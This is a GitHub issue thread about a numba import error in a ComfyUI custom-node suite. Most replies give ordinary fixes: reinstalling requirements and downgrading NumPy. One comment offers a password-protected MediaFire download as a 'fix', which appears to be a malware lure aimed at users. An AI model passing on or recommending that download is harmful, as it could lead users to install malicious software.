### ISSUE TITLE
Import failed with latest comfy update

### ISSUE THREAD

**Issue by konradre** [WASasquatch/was-node-suite-comfyui#467]
Traceback (most recent call last):
  File "D:\ComfyUI\nodes.py", line 1993, in load_custom_node
    module_spec.loader.exec_module(module)
  File "<frozen importlib._bootstrap_external>", line 883, in exec_module
  File "<frozen importlib._bootstrap>", line 241, in _call_with_frames_removed
  File "D:\ComfyUI\custom_nodes\was-node-suite-comfyui\__init__.py", line 1, in <module>
    from .WAS_Node_Suite import NODE_CLASS_MAPPINGS
  File "D:\ComfyUI\custom_nodes\was-node-suite-comfyui\WAS_Node_Suite.py", line 37, in <module>
    from numba import jit
  File "D:\ComfyUI\venv\lib\site-packages\numba\__init__.py", line 42, in <module>
    from numba.np.ufunc import (vectorize, guvectorize, threading_layer,
  File "D:\ComfyUI\venv\lib\site-packages\numba\np\ufunc\__init__.py", line 3, in <module>
    from numba.np.ufunc.decorators import Vectorize, GUVectorize, vectorize, guvectorize
  File "D:\ComfyUI\venv\lib\site-packages\numba\np\ufunc\decorators.py", line 3, in <module>
    from numba.np.ufunc import _internal
SystemError: initialization of _internal failed without raising an exception

Cannot import D:\ComfyUI\custom_nodes\was-node-suite-comfyui module for custom nodes: initialization of _internal failed without raising an exception

**Comment by praveenking945** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by buzzz3d** [comment]
I had the same error. Opening a CMD window in custom_nodes\was-node-suite-comfyui 
and doing 
pip install -r requirements.txt
fixed it for me.

**Comment by WAS-PlaiLabs** [comment]
You are missing `numba`

As the comment above suggests, install the requirements. When you update ComfyUI, or even some other custom nodes, some things may be overwritten to wrong versions.

**Comment by mainframecn** [comment]
it wants an older version of NumPy for me.

_ImportError: Numba needs NumPy 2.0 or less. Got NumPy 2.1._
